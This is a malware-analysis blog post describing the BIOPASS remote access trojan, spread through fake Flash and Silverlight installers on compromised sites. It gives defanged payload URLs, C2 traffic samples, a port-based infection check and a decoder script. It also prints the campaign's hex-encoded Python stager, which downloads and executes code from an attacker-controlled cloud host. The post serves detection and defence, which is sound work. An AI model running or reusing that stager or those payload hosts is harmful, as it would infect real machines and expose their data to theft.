SecneurX has been observing a RAT (Remote Access Trojan) that targets users of Windows systems through watering hole attacks. This RAT is now referred to as BIOPASS RAT.
The details shared in this blog come from artifacts acquired in the wild using the SecneurX Acquisition Engine. SecneurX analysed these artifacts using the SecneurX Advanced Dynamic Malware Analysis Platform and generated IOCs (Indicators of Compromise), a behavioural analysis report of the malware and threat signatures that can be consumed by SOC / security analysts.
Victims are tricked into downloading a malware loader disguised as a legitimate installer such as Adobe Flash Player or Microsoft Silverlight. The malware sets up a backdoor through which the Command & Control (C2) server controls the victim's system. It then downloads a toolkit containing tools to capture screenshots, stream desktop content, steal credentials and so on, and waits for the C2 to issue commands. Next, it establishes a socket connection to the C2, which runs on a public cloud, to exfiltrate data.
This malware has the potential to cause serious data exfiltration. It is important to watch your logs for any of the IOCs listed at the end of this blog. A detailed analysis of the behaviour of BIOPASS RAT, with network and process information, is discussed below for interested readers. Preventive steps can be taken based on the IOCs and the behavioural report attached to this blog.
The threat scenario is analysed below.
Victims are tricked into downloading malicious installers posing as Flash or Silverlight when they visit compromised websites.
During installation, the malware downloads the genuine Flash or Silverlight installer from the attackers' own hosting, such as the URL below.
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/Silverlight[.]exe
The malware then downloads a script (Python) from the C2.
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/1-CS-443[.]lua
This Python script checks whether the machine is already compromised by looking for listeners on specific ports: 43990, 43992, 53990, 33990, 33890, 48990, 12880, 22880, 32880, 42880, 52880, 62880.
If the machine is not already compromised, it downloads the subsequent payloads.
hxxp://lualibs[.]oss-cn-hongkong[.]aliyuncs[.]com/x86/Schedule[.]lua
hxxp://lualibs[.]oss-accelerate[.]aliyuncs[.]com/x86/ScheduleTask[.]dll
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
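A host-side triage check for the infection markers described above, as an added example that is not part of the original post: it parses "netstat -ano" output (a constructed sample is embedded) and reports which of the marker ports are listening and which PID owns them. The port list is the page's own; the function and sample names are mine.

```python
import re

# Listener ports the blog says BIOPASS's first-stage script probes to decide
# whether the host is already infected (the list is the page's own).
BIOPASS_MARKER_PORTS = {
    43990, 43992, 53990, 33990, 33890, 48990,
    12880, 22880, 32880, 42880, 52880, 62880,
}

# One `netstat -ano` row: proto, local address, foreign address, state, PID.
NETSTAT_ROW = re.compile(
    r"^\s*TCP\s+(?P<local>\S+)\s+\S+\s+LISTENING\s+(?P<pid>\d+)\s*$"
)


def local_port(addr: str) -> int:
    """Port from a netstat local address, IPv4 (0.0.0.0:43990) or IPv6 ([::]:43990)."""
    return int(addr.rsplit(":", 1)[1])


def find_marker_listeners(netstat_output: str) -> dict:
    """Map each BIOPASS marker port that is LISTENING to the PID owning it."""
    hits = {}
    for line in netstat_output.splitlines():
        m = NETSTAT_ROW.match(line)
        if not m:
            continue
        port = local_port(m.group("local"))
        if port in BIOPASS_MARKER_PORTS:
            hits[port] = int(m.group("pid"))
    return hits


# Constructed sample of `netstat -ano` output; addresses and PIDs are made up.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
  TCP    0.0.0.0:43990          0.0.0.0:0              LISTENING       4412
  TCP    192.0.2.25:49712       203.0.113.10:39999     ESTABLISHED     4412
  TCP    [::]:12880             [::]:0                 LISTENING       4412
  UDP    0.0.0.0:5355           *:*                                    1204
"""

if __name__ == "__main__":
    import subprocess
    # On a Windows host run the real command; elsewhere fall back to the sample.
    try:
        out = subprocess.run(["netstat", "-ano"], capture_output=True,
                             text=True, check=True).stdout
    except (OSError, subprocess.CalledProcessError):
        out = SAMPLE_NETSTAT
    for port, pid in sorted(find_marker_listeners(out).items()):
        print(f"marker port {port} is listening, owned by PID {pid}")
```

Any hit is worth triaging, since a benign service is unlikely to sit on one of these ports; the sample above yields ports 43990 and 12880 owned by PID 4412.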
The final payload was obfuscated as shown below. Decoding it reveals the URL of the BIOPASS RAT payload.
Obfuscated payload:
"exec(b''.fromhex('696d706f72742075726c6c69622e726571756573743b657865632875726c6c69622e726571756573742e75726c6f70656e2875726c6c69622e726571756573742e526571756573742827687474703a2f2f666c617368646f776e6c6f61647365727665722e6f73732d616363656c65726174652e616c6979756e63732e636f6d2f72322f626967322e70792729292e7265616428292e6465636f6465282929').decode())"
BIOPASS RAT URL after decoding:
hxxp://flashdownloadserver.oss-accelerate[.]aliyuncs[.]com/r2/big2.py
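As an added example (not the original author's tooling), the following decodes the fromhex-wrapped stager shown above without executing it and returns the URLs it would fetch, defanged in the blog's hxxp / [.] notation. The hex text is the page's own; the helper names are mine.

```python
import re

# The hex text below is the blog's own obfuscated stager; everything else in
# this block is an added example and never executes the decoded code.
OBFUSCATED_STAGER = (
    "696d706f72742075726c6c69622e726571756573743b6578656328"
    "75726c6c69622e726571756573742e75726c6f70656e28"
    "75726c6c69622e726571756573742e5265717565737428"
    "27687474703a2f2f666c617368646f776e6c6f61647365727665722e"
    "6f73732d616363656c65726174652e616c6979756e63732e636f6d2f72322f"
    "626967322e70792729292e7265616428292e6465636f6465282929"
)

# Matches the wrapper the blog shows: exec(b''.fromhex('<hex>').decode())
FROMHEX_RE = re.compile(r"fromhex\(\s*['\"]([0-9a-fA-F]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def unwrap_fromhex(snippet: str) -> str:
    """Return the plaintext hidden inside an exec(b''.fromhex(...)) wrapper.

    Accepts either the full exec(...) line or the bare hex string. Raises
    ValueError if the hex is malformed, so a truncated sample is not silently
    mis-decoded.
    """
    m = FROMHEX_RE.search(snippet)
    hexdata = m.group(1) if m else snippet.strip()
    return bytes.fromhex(hexdata).decode("utf-8", errors="replace")


def defang(url: str) -> str:
    """Render a URL in the blog's hxxp / [.] notation so it cannot be clicked."""
    scheme, _, rest = url.partition("://")
    return scheme.replace("http", "hxxp") + "://" + rest.replace(".", "[.]")


def extract_stager_urls(snippet: str) -> list:
    """Decode the stager and return every URL it would contact, defanged."""
    plaintext = unwrap_fromhex(snippet)
    return [defang(u) for u in URL_RE.findall(plaintext)]


if __name__ == "__main__":
    wrapped = f"exec(b''.fromhex('{OBFUSCATED_STAGER}').decode())"
    print(unwrap_fromhex(wrapped))
    for url in extract_stager_urls(wrapped):
        print("stager fetches:", url)
```

The decoded plaintext is a one-liner that imports urllib.request and exec()s whatever the remote URL returns, which is why the analysis should stop at decoding.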
The payload downloaded in Step 4 contains a toolkit that was fetched from the URL below.
hxxp://softres[.]oss-accelerate[.]aliyuncs[.]com/ShellExperienceHost[.]zip
The contents of the toolkit are shown in the image below. The toolkit contains a Python environment and its dependencies.
The malicious BIOPASS RAT script is downloaded from the URL below.
hxxp://flashdownloadserver.oss-accelerate.aliyuncs[.]com/r2/big2.py
To start these downloaded binaries periodically, an entry is created in the Task Scheduler.
The BIOPASS malware script contains the following tasks, which the C2 can instruct it to execute:
This malware can also deploy a Cobalt Strike payload from the URL below, which was obfuscated in the code:
hxxp://flashdownloadserver[.]oss-cn-hongkong[.]aliyuncs[.]com/res/c1222.txt
Payload:
Communication between the infected node and the C2 is base85 encoded, compressed and AES encrypted.
Encrypted data:
42["join",{"type":"client","data":"c$@*?03ZJ>jH4D#UVpo?^o7<}6%{}fj4Jv$ey?7woLCG3L!Pm^m)lSCttTFO7D$5<X6BZHa1nx)c>OG(KaGrvxrSQd(1I1tfz!&K08>;NY1S_`J<a&pbp*w^~_m80=BEu9&gKLyp*oYc7nk>4S(7+9BCV_an;BR4a`Ws|@yGxqYJdJ3>FixK5Q)ix8W@b~cnwK4K`D$#%B0div=dos=htppsbZx4Qh=@QEkVEVI72G7t>wy@u~0{zd#NJPIskliVsu=np$e^v5e1pSn)8T-{UJJW|MCWob("}]
Decrypted data:
{"do": "k", "ips": "192.168.17.132", "public_ip": "157.49.4.95", "osv": "Windows 7 x64", "cuser": "win-l842sfcie1t\\administrator", "pid": 2760, "key": "null", "uid": "1", "av": "N/A", "city": " \u70\ua6"}
The C2 issues commands such as grabbing a screenshot, collecting browser history or streaming the desktop, and the malware executes them and exfiltrates the resulting data.
Hashes
Indicators Of Compromise
Device Indicators
Behaviour report
Conclusion
Given the nature of the malware, we advise users to be careful about the applications they download. Organisations can take preventive steps based on the IOCs and the behavioural report attached to this blog.